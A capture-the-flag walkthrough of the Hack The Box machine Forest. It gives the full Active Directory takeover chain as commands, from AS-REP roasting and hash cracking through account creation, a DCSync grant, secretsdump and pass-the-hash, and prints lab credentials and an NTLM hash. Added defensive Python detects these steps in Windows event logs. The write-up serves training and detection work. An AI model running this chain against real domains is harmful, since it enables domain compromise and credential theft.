Ping

Nmap Scans
mapit 10.10.10.161
Nmap Default Scan

Nmap Service and Script Scan

Nmap All Port Scan

Nmap Service and Script Scan for New ports found

SMB is not vulnerable, and after a lot of enumeration of the SMB and LDAP services I got usernames, built-in groups and AD environment info using both ldapsearch and enum4linux. Below are the commands I used; I can't attach screenshots because the output is enormous.
enum4linux -a 10.10.10.161
ldapsearch -v -x -b "DC=htb,DC=local" -H "ldap://10.10.10.161" "(objectclass=*)" > ldap.txt
Finally got some useful info with AS-REP roasting, without a username or password:
impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -request

Will Jump to Initial Foothold…!
Will crack the hash using John; I have saved the hash in a file named asrep.hash
john --wordlist=/usr/share/wordlists/rockyou.txt asrep.hash
So the creds are svc-alfresco:s3rvice
We can now list shares
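Before moving on to the shares, here is what the AS-REP roasting step above looks like from the defender's side. This is an added example written for this page, not code from the write-up: it runs over constructed Event ID 4768 records (Kerberos TGT requested) and constructed userAccountControl values, flags requests that skipped pre-authentication and were answered with an RC4-encrypted AS-REP, and audits which accounts have the DONT_REQ_PREAUTH flag that makes them roastable in the first place. All names, IPs and event fields are sample data.

```python
DONT_REQ_PREAUTH = 0x400000   # userAccountControl bit: Kerberos pre-authentication not required
RC4_HMAC = 0x17               # encryption type roasting tools request, cheap to crack offline

# Constructed sample events in the Security-log field layout of Event ID 4768.
# Not real output from the box.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "IpAddress": "10.10.14.99",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    # normal workstation logon: pre-auth used, AES ticket
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "10.10.10.20",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "bob", "IpAddress": "10.10.14.99",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    # unknown principal: the KDC returns an error, so there is no AS-REP to crack
    {"EventID": 4768, "TargetUserName": "nosuchuser", "IpAddress": "10.10.14.99",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x6"},
    # service-ticket request (4769) is a different event and is ignored here
    {"EventID": 4769, "TargetUserName": "alice", "IpAddress": "10.10.10.20",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
]

# Constructed (sAMAccountName, userAccountControl) pairs as an LDAP query would return them.
SAMPLE_ACCOUNTS = [
    ("svc-alfresco", 0x410200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
    ("alice", 0x10200),           # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("bob", 0x400200),            # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
]


def find_asrep_roast_events(events):
    """Return 4768 events where no pre-auth was used, an RC4 ticket was issued, and the
    request succeeded (Status 0x0): exactly the responses an attacker can crack offline."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768:
            continue
        if ev.get("PreAuthType") != "0":
            continue
        if int(ev.get("TicketEncryptionType", "0x0"), 16) != RC4_HMAC:
            continue
        if ev.get("Status") != "0x0":
            continue
        hits.append(ev)
    return hits


def roasted_accounts_by_source(events):
    """Group roastable responses by requesting IP; one source asking for several
    accounts is the usual shape of a roasting sweep."""
    by_src = {}
    for ev in find_asrep_roast_events(events):
        by_src.setdefault(ev["IpAddress"], set()).add(ev["TargetUserName"].lower())
    return by_src


def accounts_without_preauth(accounts):
    """Audit which accounts carry DONT_REQ_PREAUTH; these are the ones to fix
    (clear the flag, or give them long random passwords if a legacy app needs it)."""
    return sorted(name for name, uac in accounts if uac & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    for src, names in roasted_accounts_by_source(SAMPLE_EVENTS).items():
        print(f"AS-REP roasting from {src}: {', '.join(sorted(names))}")
    print("accounts without pre-auth:", accounts_without_preauth(SAMPLE_ACCOUNTS))
```

The Status check matters: a 4768 with PreAuthType 0 is only interesting when the KDC actually answered with a ticket, otherwise it is just a failed lookup. The userAccountControl audit is the preventive half; an account that does not have the flag cannot be roasted regardless of how the KDC is queried.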
crackmapexec smb 10.10.10.161 -u svc-alfresco -p "s3rvice" --shares

We can get a session using WinRM
crackmapexec winrm 10.10.10.161 -u svc-alfresco -p "s3rvice"

Using Evil-WinRM
evil-winrm -i 10.10.10.161 -u svc-alfresco -p "s3rvice"

User.txt

Will Jump to Privilege Escalation…!
Will check our privileges
whoami /priv
We can add computers to the domain
We can add up to 10 computers (the ms-DS-MachineAccountQuota value)
Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'

Will add a computer and impersonate Administrator
impacket-addcomputer htb.local/svc-alfresco -dc-ip 10.10.10.161 -computer-name 'pwned$' -computer-pass 'pwned@3000'

But we can't set delegation rights to impersonate the Administrator, so we'll find another way: will gather AD info using SharpHound.
Firstly, we are in the group Service Accounts

Run SharpHound
Import-Module ./sharp.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\svc-alfresco\Desktop\ -OutputPrefix "forest"

Let's transfer the .zip file to our Kali box and analyse it using BloodHound
As we are members of Account Operators, we can create users in the domain and manage groups and their memberships.
Will create a user first
net user rosh pwn@3000 /add /domain

As we have GenericAll permission on the system


So first we add user rosh to the Exchange Windows Permissions group
net group "Exchange Windows Permissions" rosh /add /domain

Will give this group DCSync rights
# Add-DomainObjectAcl is a PowerView cmdlet, so PowerView must be imported first
# (e.g. Import-Module .\PowerView.ps1; the path is an assumption)
# Credentials of the user created above; the domain-qualified form is an assumption
$username = 'htb\rosh'
$password = 'pwn@3000'
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object { $secstr.AppendChar($_) }
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $secstr
Add-DomainObjectAcl -Credential $cred -PrincipalIdentity 'rosh' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

Will use secretsdump to get the NTLM hashes of users
impacket-secretsdump rosh:pwn@3000@10.10.10.161
Got Admin's NTLM
Will get a session using psexec
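The escalation path just walked (computer account added through the machine account quota, user created and put into Exchange Windows Permissions via Account Operators, ACL change, then DCSync with secretsdump) leaves a clear trail in the domain controller's Security log. The following is an added example written for this page, not code from the write-up: it runs a few detection rules over constructed events in the Security-log field layout for Event IDs 4741, 4720, 4728/4732/4756 and 4662. The DC name, the admin allowlist and every event value are assumptions made up for the sample.

```python
import re

# Control-access-right GUIDs that show up in the Properties field of Event ID 4662
# when a principal performs directory replication, which is what DCSync requests.
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # member added to a global / local / universal security group
SENSITIVE_GROUPS = {
    "domain admins", "enterprise admins", "administrators", "account operators",
    "exchange windows permissions", "exchange trusted subsystem",
}
# Assumptions for this example: the DC computer accounts that legitimately replicate,
# and the accounts allowed to create users or join machines. Populate from AD in practice.
DOMAIN_CONTROLLERS = {"forest$"}
ADMIN_ACCOUNTS = {"admin-jane"}

# Constructed sample events; not real output from the box.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "svc-alfresco", "TargetUserName": "pwned$"},
    {"EventID": 4720, "SubjectUserName": "svc-alfresco", "TargetUserName": "rosh"},
    {"EventID": 4756, "SubjectUserName": "svc-alfresco",
     "TargetUserName": "Exchange Windows Permissions",
     "MemberName": "CN=rosh,CN=Users,DC=htb,DC=local"},
    # benign: an admin adds someone to an ordinary group
    {"EventID": 4728, "SubjectUserName": "admin-jane", "TargetUserName": "Marketing",
     "MemberName": "CN=alice,CN=Users,DC=htb,DC=local"},
    # replication request from a plain user account against the domain head
    {"EventID": 4662, "SubjectUserName": "rosh", "ObjectName": "DC=htb,DC=local",
     "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # benign: DC-to-DC replication
    {"EventID": 4662, "SubjectUserName": "FOREST$", "ObjectName": "DC=htb,DC=local",
     "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # benign: an ordinary property read, no replication GUID
    {"EventID": 4662, "SubjectUserName": "rosh", "ObjectName": "CN=alice,CN=Users,DC=htb,DC=local",
     "AccessMask": "0x10",
     "Properties": "Read Property\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}")


def _guids(properties):
    return set(GUID_RE.findall(properties.lower()))


def is_dcsync(ev):
    """4662 carrying a replication control-access GUID, issued by a principal that is not a DC."""
    if ev.get("EventID") != 4662:
        return False
    if not _guids(ev.get("Properties", "")) & DS_REPLICATION_GUIDS:
        return False
    return ev.get("SubjectUserName", "").lower() not in DOMAIN_CONTROLLERS


def is_unexpected_account_creation(ev):
    """4741 (computer) or 4720 (user) performed by someone outside the admin allowlist.
    Setting ms-DS-MachineAccountQuota to 0 removes the 4741 case for ordinary users."""
    return (ev.get("EventID") in (4741, 4720)
            and ev.get("SubjectUserName", "").lower() not in ADMIN_ACCOUNTS)


def is_sensitive_group_add(ev):
    return (ev.get("EventID") in GROUP_ADD_EVENTS
            and ev.get("TargetUserName", "").lower() in SENSITIVE_GROUPS)


def analyse(events):
    """Return (rule, actor, target) findings in event order."""
    findings = []
    for ev in events:
        actor = ev.get("SubjectUserName", "")
        if is_unexpected_account_creation(ev):
            kind = "machine-account-created" if ev["EventID"] == 4741 else "user-created"
            findings.append((kind, actor, ev["TargetUserName"]))
        elif is_sensitive_group_add(ev):
            findings.append(("sensitive-group-add", actor, ev["TargetUserName"]))
        elif is_dcsync(ev):
            findings.append(("dcsync", actor, ev["ObjectName"]))
    return findings


if __name__ == "__main__":
    for rule, actor, target in analyse(SAMPLE_EVENTS):
        print(f"[{rule}] {actor} -> {target}")
```

Each rule on its own is noisy in a large domain; the point is that all four fire for the same actor within minutes, which is what makes the chain stand out. The matching preventive controls are the ones the write-up's steps depend on: a machine account quota of 0, a reviewed Account Operators membership, and a periodic audit of which principals hold the three replication rights on the domain object.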
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161

root.txt

Done with Forest…:)